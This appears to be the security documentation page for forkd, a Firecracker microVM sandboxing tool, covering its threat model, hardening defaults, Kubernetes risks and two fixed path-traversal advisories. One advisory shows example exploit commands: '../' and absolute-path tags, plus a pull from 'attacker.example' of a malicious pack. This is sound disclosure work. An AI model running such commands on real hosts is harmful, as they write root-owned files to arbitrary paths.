Skip to main content

Documentation Index

Fetch the complete documentation index at: https://mintlify.com/deeplethe/forkd/llms.txt

Use this file to discover all available pages before exploring further.

forkd provides KVM-level hardware isolation between sandboxes: each child is a separate Firecracker microVM backed by the host’s KVM hypervisor. Escaping a sandbox requires a hypervisor or kernel vulnerability — the same isolation boundary AWS Lambda relies on — not a runc or namespace regression. The REST API surface, snapshot registry, and audit log are owned by the forkd-controller daemon, which enforces bearer-token authentication and validates all user-controlled input before touching the filesystem or spawning VMs. forkd is alpha software; the guarantees documented here are what the current release delivers, with explicit callouts for items not yet hardened.

Threat model

forkd’s security design rests on three explicit assumptions:
  1. The host kernel and Firecracker are part of the TCB. A compromised host can do anything to the sandboxes running on it. forkd does not attempt to protect against a hostile administrator or a kernel compromise.
  2. Sandboxes are mutually untrusted. Each child VM has its own KVM-backed address space, its own network namespace, and its own cgroup v2 memory limit. A sandbox that escapes its KVM boundary can reach the host, but cannot directly access a peer sandbox’s memory or network traffic.
  3. The daemon’s REST surface is partially trusted. When --token-file is set, possessing the bearer token grants full control over snapshots and sandboxes on that host. Treat the token like a root credential — it is not scoped per-tenant or per-snapshot.

Default security posture

ConcernDefaultHow to harden
Daemon bind127.0.0.1:8889 (loopback only)Override with --bind; pair with --tls-cert + --token-file for any non-loopback address
TLSOff (plain HTTP)--tls-cert /etc/forkd/tls/cert.pem --tls-key /etc/forkd/tls/key.pem (rustls 0.23, TLS 1.2 + 1.3, no legacy ciphers)
AuthenticationNone--token-file /etc/forkd/token — required for any non-loopback or multi-tenant deployment
Per-child memory capNone (uncapped)Pass memory_limit_mib per sandbox on POST /v1/sandboxes — enforced via cgroup v2 memory.max
Per-child network namespaceShared host bridgeSet per_child_netns: true and run scripts/netns-setup.sh N to isolate each child’s network stack
Firecracker seccomp filterEnabled (Firecracker default)Already on — no operator action required
Guest agent reachabilityInside child netns onlyThe in-guest agent on :8888 is reachable only from within that child’s netns; the daemon does the setns(2) on your behalf
Audit log/var/log/forkd/audit.log, JSON linesTail with Vector / Fluent Bit; rotate with logrotate; feed into your SIEM

Kubernetes deployment security

The shipped packaging/k8s/forkd-controller.yaml runs the daemon with privileged: true, runAsUser: 0, and a writable /sys/fs/cgroup hostPath mount. This is necessary: Firecracker needs /dev/kvm, the daemon needs cgroup v2 writes for per-child memory caps, and tap-device creation requires CAP_NET_ADMIN. It also means the blast radius is node-level — a compromised forkd-controller Pod can escape to the underlying node. Operational consequences:
  • Treat the forkd-controller Pod’s bearer token like SSH-root on the node. Rotate it on any access change.
  • Pin the Pod to a dedicated node pool. Do not co-schedule untrusted tenants on the same node.
  • The daemon refuses to start if the manifest’s placeholder token is left in place. Any token beginning with REPLACE_ME or CHANGE_ME, or shorter than 16 bytes, is rejected at startup — a forgotten sed step becomes a noisy fail rather than a silent compromise.
  • For multi-tenant deployments, run one forkd-controller per tenant on dedicated nodes rather than sharing a daemon across tenants.
For tighter security, you can swap privileged: true for a KVM device plugin (e.g. kubevirt/kvm-device-plugin) and enumerate only the capabilities the daemon actually needs (NET_ADMIN + SYS_ADMIN).

Concurrency caps

POST /v1/sandboxes/:id/branch admits at most DEFAULT_BRANCH_CONCURRENCY (currently 4) simultaneous BRANCH operations. Excess requests receive 503 Service Unavailable. The cap bounds peak transient disk usage: each BRANCH writes a full memory.bin, typically 256 MiB to 8 GiB per operation. Tune with --branch-concurrency to match your disk throughput. Two BRANCH requests targeting the same output tag are serialized via an in-flight deduplication set; the second request gets 409 Conflict. boot_wait_secs on POST /v1/snapshots is capped at 60 seconds. Without this cap, a caller could tie up a daemon worker indefinitely.

TLS

Pass --tls-cert <cert.pem> and --tls-key <key.pem> to forkd-controller serve (or set FORKD_TLS_CERT / FORKD_TLS_KEY). The daemon uses rustls 0.23 with the aws-lc-rs crypto provider. TLS 1.2 and TLS 1.3 are accepted; legacy cipher suites are not negotiable. Both PEM files must be readable by the daemon’s user and should be mode 0600.
TLS does not automatically enable bearer-token authentication. Supply --token-file as well for any non-loopback deployment — the two protections are independent.
Use a real CA (Let’s Encrypt or your internal PKI). Self-signed certs work but require clients to bypass certificate validation. To rotate: write new files and systemctl restart forkd-controller.

What forkd does not do (yet)

The following items are not yet hardened in the current release. Operators should account for these gaps in their deployment decisions:
  • Default-deny egress. Children share the host’s MASQUERADE rule; outbound traffic to the internet works by default. For an allow-list egress policy, add per-netns iptables rules after running scripts/netns-setup.sh.
  • CPU, I/O, and PID quotas. Only memory.max is wired into ForkOpts. cpu.max, io.max, and pids.max are not yet enforced.
  • Third-party security audit. Not started. A third-party audit will be required before forkd claims a “production” status badge.
  • Multi-node scheduling. One daemon equals one host — no HA, no cross-host failover.

Past advisories

2026-05-17 — snapshot_tag path-traversal in POST /v1/sandboxes (fixed in 0.1.4)

Affected: forkd-controller 0.1.0 through 0.1.3 inclusive.
Fixed in: 0.1.4 (PR #54).
Severity: Medium-High, post-authentication.
Discovered: internal security review during the v0.2 retrospective.
POST /v1/sandboxes accepted req.snapshot_tag from the request body and joined it directly into snapshot_root without calling is_safe_tag. All sister handlers (POST /v1/snapshots, DELETE /v1/snapshots/:tag, POST /v1/sandboxes/:id/branch) validated the tag; create_sandbox was an asymmetric oversight. The unvalidated tag also persisted into SandboxInfo.snapshot_tag and was later consumed by read_snapshot_volumes during BRANCH, which deserialized the file at <snapshot_root>/<tag>/snapshot.json as a forkd_vmm::Snapshot. An attacker who could write a valid Snapshot-shaped JSON file anywhere on disk and reach the daemon’s REST surface could control the volume specs of grandchild VMs — including mounting arbitrary host block devices into a sandbox. Impact gating: exploitation requires the bearer token (or a daemon started without --token-file on a non-loopback bind, which already warned at startup). The K8s manifest’s placeholder bearer token (a separate finding in the same PR) made the auth gate brittle if kubectl apply ran without first replacing the Secret. Fix in 0.1.4:
  • is_safe_tag(&req.snapshot_tag) added to create_sandbox, returning HTTP 400 on invalid input.
  • Defense-in-depth is_safe_tag inside read_snapshot_volumes — refuses to dereference an unsafe tag even if a future caller omits the check.
  • validate_token() rejects REPLACE_ME_* / CHANGE_ME_* prefixes and tokens under 16 bytes at daemon startup.
  • boot_wait_secs on POST /v1/snapshots capped at 60 seconds.

2026-05-13 — CLI --tag path-traversal (fixed in 0.1.3)

Affected: forkd CLI 0.1.0 through 0.1.2 inclusive.
Fixed in: 0.1.3.
Severity: High — local file write as the running user; highest impact under the typical sudo forkd execution model.
Discovered: internal bug-bash, May 2026.
CLI commands that accept --tag computed their destination as data_dir().join("snapshots").join(tag). Rust’s Path::join silently discards the base when the right side is absolute, and the implementation did not reject .. segments:
# Writes Firecracker snapshot files to /etc/forkd-bad/
sudo forkd snapshot --tag /etc/forkd-bad ...

# Climbs out of the data dir
sudo forkd snapshot --tag ../../../etc/forkd-bad ...

# Malicious pack: manifest.toml declares tag = "../../etc/x"
sudo forkd pull https://attacker.example/evil.tar.zst
The same code path is hit by forkd unpack, forkd push, forkd pull, forkd fork, and forkd pack. Under sudo forkd, writes happen as root and files written can be hundreds of MiB to several GiB (memory.bin, vmstate, rootfs.ext4, snapshot.json). For Snapshot Hub users, a malicious pack with tag = "../../etc/something" in its manifest.toml would write its files anywhere the running user can write on every host that pulls it. Fix in 0.1.3: validate_tag() is applied at every CLI surface that accepts a tag, and again on the tag field read from manifest.toml inside a pack before any path is derived from it. The allowed tag shape is:
[A-Za-z0-9_][A-Za-z0-9._-]{0,63}
1–64 characters, starting with an alphanumeric or underscore. This rejects empty tags, absolute paths, .. segments, leading dots/dashes, slashes, and shell metacharacters.

Reporting a vulnerability

Email security@deeplethe.com. Do not open a public GitHub issue for security reports. We aim to acknowledge within 72 hours and ship a fix or mitigation within 14 days for confirmed issues.

Supported versions

Pre-1.0 releases receive fixes only on the latest minor. The CHANGELOG records which API versions are affected by each advisory.

Build docs developers (and LLMs) love